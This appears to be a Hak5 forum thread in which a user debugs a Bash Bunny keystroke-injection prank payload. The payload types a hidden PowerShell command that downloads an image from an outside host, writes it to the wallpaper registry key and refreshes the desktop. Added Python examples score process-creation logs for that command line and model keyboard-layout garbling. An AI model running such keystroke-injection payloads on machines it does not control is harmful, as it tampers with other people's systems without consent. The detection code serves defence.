Dragus Posted February 13, 2019

Hello everyone, I've been fiddling with multiple payloads for a while on multiple computers. I've seen various results (depending on the PC) and got very close (I think) to making a few of the payloads work properly after changing their configuration. One I'd like to get working for a starter is the Wallpaper Changer of Doom. It's not related to that specific payload, but on the Windows 7 computer, it opens the command prompt (with "CMD" in it) and nothing happens. The first time I plugged it in, it installed a driver (from Windows) for a few minutes. I think it's an issue related to Quack (typing characters); here's what I got so far:

LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}""
Q ENTER

It seems to be blinking yellow from that point. Any idea how I could debug this?
PoSHMagiC0de Posted February 13, 2019

Hmm, on your computer when you hit "windows key + r" what happens? If nothing, you have a keyboard like mine that can disable the windows key and that also stops the BB GUI command. If not, try opening notepad and set a payload to just type string to see if anything is coming across at all.
Dragus (Author) Posted February 13, 2019

I tried it, Windows + R opens the command prompt with "cmd" written in it. It's the same thing I see when executing the payload, but after that, no text is written. I'll try a payload to only write text and see from there (it'll take a while, so I'll learn the basics further); it's a good idea since it would isolate the issue. Thanks for the reply!
Dragus (Author) Posted February 14, 2019

Here's a follow-up! I think there's a typo on the YouTube video or GitHub, not sure from where yet. There was an unescaped quote at the end of the line. This works "better":

LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\""
Q ENTER

Now the result is that I see PowerShell open up and close right away. I'm not sure if it's the normal behavior since there are many variations of this prank script. (If someone knows, enlighten me.) Also, that's me being slightly lazy, but in this script's context, what would the variable $home typically point to? I wanna debug further and try to find the image. Finally, do you think that the image fetching follows the URL (there are redirections)? Or does it fail because the first answer wasn't HTTP 200? Thank you for any ideas, I'm happy I progressed!
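Seen from the defender's side, the command line this payload types (hidden-window PowerShell, a web download with iwr, a Set-ItemProperty write to the HKCU wallpaper key, and a rundll32 UpdatePerUserSystemParameters refresh) is a recognisable process-creation artifact. The following Python is an added example, not code from this thread or from Hak5: it scores constructed sample command lines (made up here, not real host data) against those indicators. The indicator regexes and the threshold of three hits are assumptions for the example, to be tuned against a real baseline of admin activity.

```python
# Added example, not code from the thread or from Hak5: score Windows
# process-creation command lines (e.g. the command-line field of event 4688
# or Sysmon event 1) for the indicators the wallpaper payload leaves behind.
import re
from dataclasses import dataclass

# Each indicator pairs a label with a case-insensitive regex. The patterns
# accept both the short aliases the payload uses (-w h, iwr, SP) and the
# long PowerShell spellings an operator might type instead.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("web_download", re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b", re.I)),
    ("wallpaper_regkey", re.compile(r"HKCU:\\?Control Panel\\Desktop", re.I)),
    ("set_itemproperty", re.compile(r"\b(?:sp|set-itemproperty)\b", re.I)),
    ("refresh_desktop", re.compile(r"UpdatePerUserSystemParameters", re.I)),
]

@dataclass
class Finding:
    line_no: int          # 1-based index into the scanned log
    matched: list         # indicator labels that fired, in table order
    command_line: str

def scan(log_lines, threshold=3):
    """Return a Finding for every PowerShell command line that trips at
    least `threshold` indicators. The threshold is an assumption for this
    example; a single hit (e.g. SP alone) is far too noisy on its own."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        if "powershell" not in line.lower():
            continue
        hits = [name for name, rx in INDICATORS if rx.search(line)]
        if len(hits) >= threshold:
            findings.append(Finding(n, hits, line))
    return findings

# Constructed sample log: command-line fields only, no real host data.
SAMPLE_LOG = [
    # benign interactive admin use
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    # the command line the payload above intends to type
    r'''powershell -w h "$p=$home+'\z.jpg';iwr magikweb.ca/z.jpg -O $p;SP 'HKCU:Control Panel\Desktop' WallPaper $p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"''',
    # the same attempt garbled by a non-US keyboard layout (as posted later
    # in the thread): the registry path no longer matches, the rest still does
    "powershell -w h `$p=$home+`<z.jpg`;iwr https:ééwww.magikweb.caéz.jpg -O $p;SP `HKCU:Control Panel<Desktop`WallPaper $p;1..29>%^RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1¨pause",
    # benign: wallpaper set from a local file, no download, no hidden window
    "powershell -Command \"Set-ItemProperty 'HKCU:\\Control Panel\\Desktop' WallPaper C:\\corp\\bg.jpg\"",
    r"notepad.exe C:\Users\User\notes.txt",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.matched)}")
        print(f"    {f.command_line[:80]}...")
```

The garbled variant is included on purpose: a keystroke-injection attempt that fails because of the host's keyboard layout still lands in the process-creation log, and the indicators that survive the garbling (the -w h switch, iwr, SP, the rundll32 export name) are enough to flag it, while the local-file wallpaper script stays below the threshold.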
Dave-ee Jones Posted February 14, 2019

@Dragus You can try adding a pause at the end of your PowerShell command. This will keep the PowerShell window open until you press Enter so you can see errors and the like. Very useful. $home points to your current user's home directory. E.g. if your name is 'User' then it will go to: C:\Users\User Not sure about $p. Old me might've known..
Dragus (Author) Posted February 15, 2019

Thanks! That helped me find the reason for my next problem. Here is what it really writes in the command prompt:

powershell -w h `$p=$home+`<z.jpg`;iwr https:ééwww.magikweb.caéz.jpg -O $p;SP `HKCU:Control Panel<Desktop`WallPaper $p;1..29>%^RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1¨pause

That's really messy. It seems like it's assuming I have a US English keyboard. Is that a common issue? I would think a lot of non-US countries' users would have a similar issue.
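The typed line above differs from the intended one character by character wherever the HID scancode for a US-layout symbol lands on a different symbol in the host's active layout. As an added example (not code from this thread or from Hak5), the Python below models that mismatch: it predicts what a US-layout keystroke string renders as on the poster's layout, lists the positions that will be altered, and rebuilds the substitution table by lining up equal-length fragments of the intended and typed command lines. The table is reconstructed from the two posts only and is an assumption: it covers the seven characters that visibly changed, assumes every other key types unchanged, and does not model the space that the typed line dropped before WallPaper.

```python
# Added example, not code from the thread or from Hak5: model how a
# US-layout keystroke string renders on a host whose keyboard layout differs.
# OBSERVED_SUBSTITUTIONS is reconstructed from the intended (Feb 14) and
# typed (Feb 15) command lines in this thread; it is an assumption and only
# covers the characters that visibly changed there.
OBSERVED_SUBSTITUTIONS = {
    '"': "`",
    "'": "`",
    "\\": "<",
    "/": "é",
    "|": ">",
    "{": "^",
    "}": "¨",
}

def predict_typed(intended, table=OBSERVED_SUBSTITUTIONS):
    """Return the string the host receives for an intended keystroke string;
    characters absent from the table are assumed to type unchanged."""
    return "".join(table.get(ch, ch) for ch in intended)

def mistyped_positions(intended, table=OBSERVED_SUBSTITUTIONS):
    """List (index, intended_char, typed_char) for every altered character,
    i.e. the spots a payload author would have to look at first."""
    return [(i, ch, table[ch]) for i, ch in enumerate(intended) if ch in table]

def infer_substitutions(pairs):
    """Rebuild a substitution table from (intended, observed) fragment pairs
    that align character for character. Raises on length mismatch or if one
    intended character is seen mapping to two different outputs."""
    table = {}
    for intended, observed in pairs:
        if len(intended) != len(observed):
            raise ValueError("fragments must align character for character")
        for a, b in zip(intended, observed):
            if a == b:
                continue
            if table.get(a, b) != b:
                raise ValueError(f"inconsistent mapping for {a!r}")
            table[a] = b
    return table

# Equal-length fragments taken from the two posts (intended vs. typed).
FRAGMENT_PAIRS = [
    ("'HKCU:Control Panel\\Desktop'", "`HKCU:Control Panel<Desktop`"),
    ("1..29|%{RUNDLL32.EXE", "1..29>%^RUNDLL32.EXE"),
]

# The command line the Feb 14 payload intends to type, with the shell
# escapes (\" and \$) already resolved.
INTENDED_COMMAND = r'''powershell -w h "$p=$home+'\z.jpg';iwr magikweb.ca/z.jpg -O $p;SP 'HKCU:Control Panel\Desktop' WallPaper $p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"'''

if __name__ == "__main__":
    print("table inferred from fragments:", infer_substitutions(FRAGMENT_PAIRS))
    print("predicted typed line:")
    print("  " + predict_typed(INTENDED_COMMAND))
    for i, a, b in mistyped_positions(INTENDED_COMMAND):
        print(f"  offset {i:3d}: {a!r} -> {b!r}")
```

Running the script shows that every altered character is a shell or path metacharacter (quotes, backslash, slash, pipe, braces), which is why the command falls apart rather than merely misspelling a word; it also shows why command lines left by keystroke injection on non-US hosts can look garbled in process logs while the unaffected tokens (powershell, -w h, iwr, the rundll32 export) remain intact.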
Dragus (Author) Posted February 15, 2019

I forgot to add context in my last post. I thought about using DUCKY_LANG, but my keyboard (and most people's here) does not follow 2-letter country codes. Here's one of mine (the one I use the most): https://prnt.sc/ml9yya Is there a way for the Bash Bunny to automatically adapt to the target's environment (Windows' current keyboard layout)?
This topic is now archived and is closed to further replies.